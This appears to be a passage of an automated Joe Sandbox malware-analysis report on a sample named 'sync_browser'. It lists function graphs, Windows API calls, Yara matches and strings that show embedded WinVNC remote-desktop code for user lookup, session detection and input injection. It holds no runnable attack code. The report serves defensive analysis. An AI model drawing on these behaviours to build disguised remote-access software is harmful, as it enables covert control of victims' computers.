7ff6dc0ca017 22866->22867 22869 7ff6dc0c9e93 22868->22869 22870 7ff6dc0c9fe1 _RunAllParam 22868->22870 22869->22870 22871 7ff6dc0c9eac OpenServiceA 22869->22871 22870->22864 22871->22870 22872 7ff6dc0c9ecb QueryServiceConfigA 22871->22872 22873 
7ff6dc0c9ee5 GetLastError 22872->22873 22874 7ff6dc0c9fc7 CloseServiceHandle 22872->22874 22873->22874 22877 7ff6dc0c9ef4 _RunAllParam 22873->22877 22874->22869 22874->22870 22875 7ff6dc0c9f08 QueryServiceConfigA 22875->22877 22876 7ff6dc0c29a0 81 API calls 22876->22877 22877->22874 22877->22875 22877->22876 22879 7ff6dc0c2a17 22878->22879 22883 7ff6dc0c29bd 22878->22883 22880 7ff6dc0c2a29 22879->22880 22897 7ff6dc1770b4 71 API calls std::exception::exception 22879->22897 22884 7ff6dc0c2a42 22880->22884 22898 7ff6dc0c3050 81 API calls std::exception::exception 22880->22898 22883->22879 22885 7ff6dc0c29e6 22883->22885 22884->22862 22886 7ff6dc0c2d12 22885->22886 22899 7ff6dc177110 71 API calls std::exception::exception 22885->22899 22888 7ff6dc0c2d41 22886->22888 22889 7ff6dc0c2d22 22886->22889 22891 7ff6dc0c2d53 22888->22891 22902 7ff6dc1770b4 71 API calls std::exception::exception 22888->22902 22900 7ff6dc0c2fb0 71 API calls 22889->22900 22896 7ff6dc0c2d3c 22891->22896 22903 7ff6dc0c3050 81 API calls std::exception::exception 22891->22903 22892 7ff6dc0c2d2f 22901 7ff6dc0c2fb0 71 API calls 22892->22901 22896->22862 22897->22880 22898->22884 22899->22886 22900->22892 22901->22896 22902->22891 22903->22896 24055 7ff6dc0cf700 280 API calls 2 library calls 24056 7ff6dc0d2d00 24 API calls 24057 7ff6dc0f34f7 10 API calls _getdrive 24058 7ff6dc0cff30 11 API calls _getdrive 24061 7ff6dc0da130 173 API calls 4 library calls 24062 7ff6dc0e3530 120 API calls 2 library calls 24063 7ff6dc0f3523 92 API calls 2 library calls 24069 7ff6dc0e4003 242 API calls 2 library calls
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                                    • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                    • API String ID: 459429253-3399855497
                                                                    • Opcode ID: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                    • Instruction ID: 20d5a5b8565e7fbf19c094270eb1dd6075f7dd5da39ee2c9c9567dc5cca3692a
                                                                    • Opcode Fuzzy Hash: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                    • Instruction Fuzzy Hash: 6FA2BE26A08A9585EB50DB29C848BFE37A9FB84B94F054233CA1DC77E5DF39D466C700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                                    • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                                    • API String ID: 1881659197-3751679782

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF6DC129F3B
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF6DC12A06F
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF6DC12A01F
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF6DC129F7F
                                                                    • vncservice.cpp : getusername error %d, xrefs: 00007FF6DC12A04A
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF6DC12A094
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF6DC129FB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                                    • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                                    • API String ID: 3635673080-2232443292

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                                    • String ID:
                                                                    • API String ID: 3151975580-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                                    • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                                    • API String ID: 2172171234-2418058073

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1935883720-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                                    • String ID:
                                                                    • API String ID: 772457954-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                                    • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                                    • API String ID: 958158500-3765181313

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                                    • String ID: ?
                                                                    • API String ID: 2900023865-1684325040
                                                                    • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                    • Instruction ID: c5f1ae747162502b9093d8709b991f65b36e826cbc99f39ebf527bc77767c6b5
                                                                    • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                    • Instruction Fuzzy Hash: AD312C3560DB8985E7608B25F85536EB3A8FB8A784F000036DA8D87B58DF3DD026CB41

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                                    • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                                    • API String ID: 1369618222-3178290357
                                                                    • Opcode ID: 35763fb2557c9489e4576fa8d485d6919a2073118b788ba794957893b6d6bdd5
                                                                    • Instruction ID: f7773984d6c0458902399e2ac32a3415461cd23273ef5c2284e00ed1d3211640
                                                                    • Opcode Fuzzy Hash: 35763fb2557c9489e4576fa8d485d6919a2073118b788ba794957893b6d6bdd5
                                                                    • Instruction Fuzzy Hash: BDB1E732625BE196E3488B24EA443DDB7ACF744B54F24422AE3A847B91DF7A6076C740

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                                    • String ID:
                                                                    • API String ID: 1366308849-0
                                                                    • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                    • Instruction ID: 8de4589f8b9abc4bd391949da3bd93d4b4f3aa8fea8a9f6565b857b55e2f9da2
                                                                    • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                    • Instruction Fuzzy Hash: D6314921E1C66B96EB118F24A8451BDB3B9FF85354F200237E65D826A9DF3CD46BCB40

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                                    • String ID:
                                                                    • API String ID: 2120259006-0
                                                                    • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                    • Instruction ID: 55d224835a029b668e41e0d1b215426d744cc4584734c6feca30c80942469886
                                                                    • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                    • Instruction Fuzzy Hash: C6512372604B85DEE7648F30D88429DB7A8FB4870CF004526EB5C87A58DF78D6A6CB54

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                                    • String ID:
                                                                    • API String ID: 3283625137-0
                                                                    • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                    • Instruction ID: d5100b54ee26b385ce08d9e1e15bf5f2f7aa63f4bc3f8b664943a3de07884e84
                                                                    • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                    • Instruction Fuzzy Hash: 3021B621E0C7A995FA159B55EC416AEB398FF44B90F844236EE6D837D6CF3CE0628700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ComputerLibraryLoadName
                                                                    • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                                    • API String ID: 2278097360-3189507618
                                                                    • Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                    • Instruction ID: de52db942e415ead4465d3c7e34e9c96b3f604d5b7308b9bdc7dcaa2490241df
                                                                    • Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                    • Instruction Fuzzy Hash: 3031E221B09B5A81FB54DB2AF85032D2794EF89B44F00413AC64E973E5EF3EC066C380

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 2660421340-1071638575
                                                                    • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                    • Instruction ID: e3a812ddd260107d2755783968f3c2f59298ac92b73acdaf478e14f06db36576
                                                                    • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                    • Instruction Fuzzy Hash: B701F221608B9581E7009B52BC505AAB668FF89BD4F144036DE4E83B24DE3CD497C700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF6DC0E3429
                                                                    • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF6DC0E3502
                                                                    • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF6DC0E3490
                                                                    • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF6DC0E33D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                                    • API String ID: 1452528299-2001727811
                                                                    • Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                    • Instruction ID: 36540a134be234d106b63e79e9807173ac9b3651486575653cb2efadd6a3fcda
                                                                    • Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                    • Instruction Fuzzy Hash: 5041F966A05A8A81EB509F26C4887FD27A8FBC4F44F584072CE0DC77A5DF3AD59AC310
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                                    • String ID: <unavailable>
                                                                    • API String ID: 4131039871-1096956887
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: connectgethostbynamehtonsinet_addr
                                                                    • String ID:
                                                                    • API String ID: 599670773-0
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _callnewh_errno$AllocHeapmalloc
